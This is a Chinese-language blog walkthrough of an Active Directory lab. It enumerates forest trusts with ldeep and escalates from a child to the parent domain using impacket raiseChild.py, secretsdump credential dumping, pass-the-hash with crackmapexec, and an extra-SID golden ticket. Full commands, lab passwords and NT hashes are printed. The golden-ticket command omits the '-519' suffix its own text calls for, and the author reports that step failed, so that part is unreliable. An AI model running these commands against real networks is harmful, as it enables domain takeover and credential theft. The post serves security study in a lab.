Trusts:Enumerate Trust
•使用ldeep枚举信任关系
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 trusts
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.12 trusts
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 trusts
dn: CN=essos.local,CN=System,DC=sevenkingdoms,DC=local
cn: essos.local
securityIdentifier: S-1-5-21-3888409149-2120389158-266936499
name: essos.local
trustDirection: bidirectional
trustPartner: essos.local
trustType: Windows domain running Active Directory
trustAttributes: FOREST_TRANSITIVE | TREAT_AS_EXTERNAL
flatName: ESSOS
dn: CN=north.sevenkingdoms.local,CN=System,DC=sevenkingdoms,DC=local
cn: north.sevenkingdoms.local
securityIdentifier: S-1-5-21-3148635071-1740920068-3009913003
name: north.sevenkingdoms.local
trustDirection: bidirectional
trustPartner: north.sevenkingdoms.local
trustType: Windows domain running Active Directory
trustAttributes: WITHIN_FOREST
flatName: NORTH
---
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.12 trusts
dn: CN=sevenkingdoms.local,CN=System,DC=essos,DC=local
cn: sevenkingdoms.local
securityIdentifier: S-1-5-21-3909331934-1368599321-1895990551
name: sevenkingdoms.local
trustDirection: bidirectional
trustPartner: sevenkingdoms.local
trustType: Windows domain running Active Directory
trustAttributes: FOREST_TRANSITIVE
flatName: SEVENKINGDOMS
wulala@wulala-VirtualBox:~$ 
•sevenkingdoms到essos的信任关系是FOREST_TRANSITIVE | TREAT_AS_EXTERNAL,因为Sid history开启了,essos到sevenkingdoms的信任关系是FOREST_TRANSITIVE.•或者,对应的ldap查询语句是(objectCategory=trustedDomain)•ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(objectCategory=trustedDomain)'
north.sevenkingdoms.local 和 sevenkingdoms.local 之间的域双向信任(子/父关系)
WITHIN_FOREST(林内信任):用于同一林内的域之间建立信任,允许资源和用户之间的无缝访问和认证。
essos.local 和 sevenkingdoms.local 之间的(FOREST_TRANSITIVE(林传递信任):允许整个林之间建立传递信任。)
Trusts:Domain Trust - child/parent
(north.sevenkingdoms.local -> sevenkingdoms.local)
现在假设拥有了 north.sevenkingdoms.local 域,已经dump 了 ntds,并且获得了所有 north 域用户的所有 NT 哈希。
RaiseMeUp - Escalate with impacket raiseChild
要从子域升级到父域,最简单的方法是使用 impacket 的 raiseChild.py 脚本。
eddard.stark 是 north.sevenkingdoms.local(192.168.56.11) 的域管理员
这里用impacket原生包
raiseChild.py north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'
wulala@wulala-VirtualBox:~/intranet-tools/impacket-0.10.0/examples$ python3 raiseChild.py north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra
[*] Raising child domain north.sevenkingdoms.local
[*] Forest FQDN is: sevenkingdoms.local
[*] Raising north.sevenkingdoms.local to sevenkingdoms.local
[*] sevenkingdoms.local Enterprise Admin SID is: S-1-5-21-3909331934-1368599321-1895990551-519
[*] Getting credentials for north.sevenkingdoms.local
north.sevenkingdoms.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
north.sevenkingdoms.local/krbtgt:aes256-cts-hmac-sha1-96s:f96ec2ef58e7ac5d8670ff97bafe7e16d27a25c0d29774e64f7b8f4b43ee78dd
[*] Getting credentials for sevenkingdoms.local
sevenkingdoms.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8c525ba9867b56c3051c18377956d813:::
sevenkingdoms.local/krbtgt:aes256-cts-hmac-sha1-96s:b8ee160fc25bc6b24eed71dde183fd8a92ad83099eaf81f6e99876db570b13bf
[*] Target User account name is Administrator
sevenkingdoms.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
sevenkingdoms.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4d
这里生成可一个krbtgt,为forest enterprise admin(林管理员)创建了一张金票。登录森林并获取目标信息(默认管理员 RID:500)
sevenkingdoms.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
cme smb 192.168.56.10 -u Administrator -H ':c66d72021a2d4744409969a581a1705e' -d sevenkingdoms.local
wulala@wulala-VirtualBox:~$ cme smb 192.168.56.10 -u Administrator -H ':c66d72021a2d4744409969a581a1705e' -d sevenkingdoms.local
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [+] sevenkingdoms.localAdministrator::c66d72021a2d4744409969a581a1705e (Pwn3d!)
Golden ticket + ExtraSid
•首先导出我们拥有的north域的krbtgt
# dump child ntds and get krbtgt NT hash
secretsdump.py -just-dc-user north/krbtgt north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11
wulala@wulala-VirtualBox:~/intranet-tools/impacket-0.10.0/examples$ python3 secretsdump.py -just-dc-user north/krbtgt north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f96ec2ef58e7ac5d8670ff97bafe7e16d27a25c0d29774e64f7b8f4b43ee78dd
krbtgt:aes128-cts-hmac-sha1-96:6265aa3383780121404d894cd629f3ba
krbtgt:des-cbc-md5:5d80d049ecec835d
[*] Cleaning up...
得到了krbtgt
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
•然后获得子域和父域的SID
# dump child domain SID (Security Identifier)
lookupsid.py -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11 0
[*] Domain SID is: S-1-5-21-3148635071-1740920068-3009913003
# dump parent domain SID
lookupsid.py -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.10 0
[*] Domain SID is: S-1-5-21-3909331934-1368599321-1895990551
OK ~
现在创建金票:在 extra-sid 的末尾添加“-519”(表示企业管理员)
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
python3 ticketer.py -nthash d1a786683542dc8ce782c3af71dbecc5
-domain-sid S-1-5-21-3148635071-1740920068-3009913003
-domain north.sevenkingdoms.local
-extra-sid S-1-5-21-3909331934-1368599321-1895990551
goldenuser
export KRB5CCNAME=goldenuser.ccache
secretsdump.py -k -no-pass -just-dc-ntlm north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local
直接失败了。排查一圈儿,都不行。应该是环境的问题。大致上是这个流程,
真滴绝了,一步步来就GG,还是直接用之前的脚本吧。一把梭一把梭
原文始发于微信公众号(wulala520):Trusts:Enumerate Trust
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论